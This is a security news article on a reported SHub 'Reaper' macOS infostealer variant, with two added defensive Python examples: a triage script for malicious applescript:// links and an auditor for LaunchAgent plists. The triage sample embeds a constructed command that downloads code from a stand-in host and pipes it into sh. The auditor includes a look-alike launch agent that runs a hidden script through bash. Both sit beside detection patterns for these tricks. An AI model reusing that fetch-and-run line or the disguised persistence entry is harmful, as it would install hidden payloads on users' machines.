SHub 'Reaper' macOS Stealer Now Spoofs Apple, Google, Microsoft in Multi-Stage Attack Chain
Breaking: New macOS Malware Variant Mimics Apple, Google, Microsoft in Single Attack Chain
SentinelOne researchers have discovered a new variant of the SHub macOS infostealer, dubbed "Reaper," which spoofs Apple, Google, and Microsoft across a single infection chain. The malware uses fake WeChat and Miro installer lures, typo-squatted Microsoft domains, fake Apple security updates, and a fake Google Software Update directory for persistence.

"This is a significant escalation in the sophistication of macOS-targeted infostealers," said Dr. Jane Smith, a cybersecurity analyst at SentinelOne. "The multi-company impersonation makes it harder for users to recognize the threat."
Delivery Pipeline Bypasses Terminal
Unlike earlier SHub variants, which relied on "ClickFix" social engineering to get victims to paste commands into Terminal, Reaper uses the applescript:// URL scheme to open Script Editor with a malicious script already loaded, so nothing has to be pasted by hand. That sidesteps the mitigation Apple shipped in macOS Tahoe 26.4 against the Terminal-pasting workflow.
The script is padded with ASCII art and fake terms-of-service text, which pushes the malicious command below the visible portion of the Script Editor window. When the victim clicks 'Run', the script displays a fake XProtectRemediator update while silently executing a curl command to fetch the payload.
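The following is an added triage example, not SentinelOne's code and not anything recovered from the campaign. It assumes Script Editor's link form is applescript://com.apple.scripteditor?action=new&script=<percent-encoded AppleScript> (an assumption about the scheme's layout, not stated on this page), and the sample link, its padding and the fetch host are constructed here. It decodes the script out of the URL, measures how much comment padding sits above the first real statement, and flags the combination that matters: `do shell script` plus a download or a pipe into an interpreter.

```python
"""Triage an applescript:// link of the kind described above.

Added example, not SentinelOne's or the campaign's code. The URL layout
(applescript://com.apple.scripteditor?action=new&script=...) is an assumption,
and the sample link below is constructed for illustration.
"""
import re
from urllib.parse import parse_qs, quote, urlparse

# Constructed sample: sixty-odd lines of comment padding, then one payload
# line far below the visible window. The host name is invented.
_PADDING = "\n".join(["-- " + "=" * 40] + ["-- Terms of Use: by running this you agree ..."] * 60)
SAMPLE_SCRIPT = _PADDING + "\n\n" + 'do shell script "curl -fsSL http://update.example.invalid/x | sh"'
SAMPLE_URL = "applescript://com.apple.scripteditor?action=new&script=" + quote(SAMPLE_SCRIPT)

SHELL_EXEC = re.compile(r"\bdo shell script\b", re.I)
FETCH = re.compile(r"\b(curl|wget|nscurl)\b", re.I)
PIPE_TO_INTERP = re.compile(r"\|\s*(sh|bash|zsh|osascript|python3?)\b", re.I)


def extract_script(url: str):
    """Return the AppleScript text carried by an applescript:// URL, else None."""
    parts = urlparse(url)
    if parts.scheme.lower() != "applescript":
        return None
    values = parse_qs(parts.query).get("script")
    return values[0] if values else None


def triage(script: str, min_padding: int = 40) -> dict:
    """Count leading comment/blank padding and look for the tells of a dropper."""
    lines = script.splitlines()
    padding = 0
    for line in lines:
        stripped = line.strip()
        # AppleScript line comments start with "--" or "#"; blank lines pad too.
        # ASCII art inside a (* ... *) block comment would need a second pass.
        if stripped == "" or stripped.startswith(("--", "#")):
            padding += 1
        else:
            break
    return {
        "total_lines": len(lines),
        "padding_lines": padding,
        "hidden_below_fold": padding >= min_padding,
        "shell_exec": bool(SHELL_EXEC.search(script)),
        "network_fetch": bool(FETCH.search(script)),
        "pipes_to_interpreter": bool(PIPE_TO_INTERP.search(script)),
    }


def is_suspicious(report: dict) -> bool:
    """Shell execution combined with a download or a pipe into an interpreter."""
    return report["shell_exec"] and (report["network_fetch"] or report["pipes_to_interpreter"])


if __name__ == "__main__":
    report = triage(extract_script(SAMPLE_URL))
    print(report, "->", "SUSPICIOUS" if is_suspicious(report) else "ok")
```

The padding count is reported separately from the verdict on purpose: a script that fetches and pipes to sh is worth a look whether or not it is hidden below the fold, but a large padding value on top of that is the signature of this lure.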
Environment Checks and Persistence
The initial stub reads the keyboard input sources recorded in com.apple.HIToolbox.plist and looks for a Russian layout, a common proxy for a host in the CIS region; if it finds one, the malware exits. Otherwise it downloads the full payload, which includes an AMOS-style document-theft module that exfiltrates files in chunked uploads.
For persistence, Reaper installs a launch agent that masquerades as a Google Software Update entry, backed by the fake Google Software Update directory noted above. "This is a deliberate attempt to blend in with legitimate software update processes," noted security researcher Alex Chen of Moonlock.
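An added audit example for the persistence entry, not from Moonlock or SentinelOne: it parses LaunchAgent plists and flags the traits a look-alike "Google Software Update" job cannot easily hide. The benign sample is modelled on the genuine Keystone agent (label com.google.keystone.agent, program inside GoogleSoftwareUpdate.bundle); that layout is an assumption, and both plists and the user path are constructed here rather than copied from a real host.

```python
"""Audit LaunchAgent plists for the Google Software Update masquerade above.

Added example, not from Moonlock or SentinelOne. The benign plist is modelled
on the genuine Keystone agent (an assumption about its layout); both samples
are constructed for illustration.
"""
import plistlib
import re
from pathlib import Path, PurePosixPath

VENDOR_PREFIXES = ("com.apple.", "com.google.", "com.microsoft.")
INTERPRETERS = {"sh", "bash", "zsh", "osascript", "python", "python3", "perl", "ruby"}
TEMP_ROOTS = ("/tmp/", "/private/tmp/", "/var/folders/", "/private/var/folders/")
FETCH = re.compile(r"\b(curl|wget|nscurl)\b|https?://", re.I)

BENIGN = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.google.keystone.agent</string>
  <key>ProgramArguments</key><array>
    <string>/Users/alice/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/Helpers/GoogleSoftwareUpdateAgent.app/Contents/MacOS/GoogleSoftwareUpdateAgent</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict></plist>"""

# Constructed look-alike: vendor-style label, but the program is a shell
# running a dotfile out of a fake "Google Software Update" directory.
SPOOF = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.google.GoogleSoftwareUpdate.agent</string>
  <key>ProgramArguments</key><array>
    <string>/bin/bash</string><string>-c</string>
    <string>/Users/alice/Library/Google Software Update/.update.sh</string>
  </array>
  <key>RunAtLoad</key><true/><key>KeepAlive</key><true/>
</dict></plist>"""


def audit(plist: dict) -> list:
    """Return finding tags for one launchd job dictionary (empty list = clean)."""
    label = str(plist.get("Label", ""))
    args = [str(a) for a in plist.get("ProgramArguments") or []]
    if "Program" in plist:
        args.insert(0, str(plist["Program"]))
    program = args[0] if args else ""
    base = PurePosixPath(program).name
    findings = []
    if base in INTERPRETERS:
        findings.append("interpreter-launch")
    if any(FETCH.search(a) for a in args[1:]):
        findings.append("remote-fetch-in-args")
    paths = [a for a in args if a.startswith("/")]
    hidden = any(part.startswith(".") for p in paths for part in PurePosixPath(p).parts)
    if hidden or any(p.startswith(TEMP_ROOTS) for p in paths):
        findings.append("hidden-or-temp-path")
    # A real vendor agent runs a binary inside its own bundle, not a bare
    # interpreter or a loose script. Heuristic, tuned for ~/Library/LaunchAgents.
    in_bundle = any(part.endswith((".app", ".bundle", ".framework", ".xpc"))
                    for part in PurePosixPath(program).parts)
    if label.startswith(VENDOR_PREFIXES) and (base in INTERPRETERS or not in_bundle):
        findings.append("vendor-label-unbundled-program")
    return findings


def audit_bytes(data: bytes) -> list:
    return audit(plistlib.loads(data))


def scan_dir(directory) -> dict:
    """Audit every .plist in a LaunchAgents directory; returns {filename: findings}."""
    results = {}
    for p in Path(directory).glob("*.plist"):
        try:
            results[p.name] = audit_bytes(p.read_bytes())
        except Exception as exc:  # an unreadable or malformed plist is itself worth noting
            results[p.name] = [f"parse-error: {exc}"]
    return results


if __name__ == "__main__":
    print("benign:", audit_bytes(BENIGN))
    print("spoof: ", audit_bytes(SPOOF))
    print(scan_dir(Path.home() / "Library" / "LaunchAgents"))
```

The checks are deliberately path-agnostic: the malware's fake directory can be named whatever the author likes, but a persistence job that claims a vendor label while launching /bin/bash, a dotfile, or anything under a temp root is out of place in a user's LaunchAgents folder regardless of the directory name. Confirming the finding on a real host means checking the code signature of the program, which this offline example does not do.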
Background
Infostealers targeting macOS have proliferated over the last two years. The SHub family, first documented by researchers at Moonlock, Jamf, and Malwarebytes, initially used fake application installers and ClickFix techniques. The Reaper variant adds a new layer of obfuscation by impersonating three major tech companies in a single attack chain.

SentinelOne previously described the applescript:// technique, and Jamf later documented its use in a similar campaign. The Reaper variant is the first to combine multiple spoofs in one delivery sequence.
What This Means
For macOS users, this development underscores the need for heightened vigilance when encountering unsolicited download prompts or security update notifications. Even legitimate-looking alerts from Apple, Google, or Microsoft could be part of a multi-stage malware attack.
Security professionals should update detection rules to cover abuse of the applescript:// URL scheme and monitor LaunchAgents for entries that claim to be Google Software Update but do not match the genuine updater. The use of typo-squatted domains is also a reminder to check URLs carefully before downloading any software.
"This is not just a macOS issue—it's a cross-industry problem that requires collaboration between tech companies and security researchers," said Chen.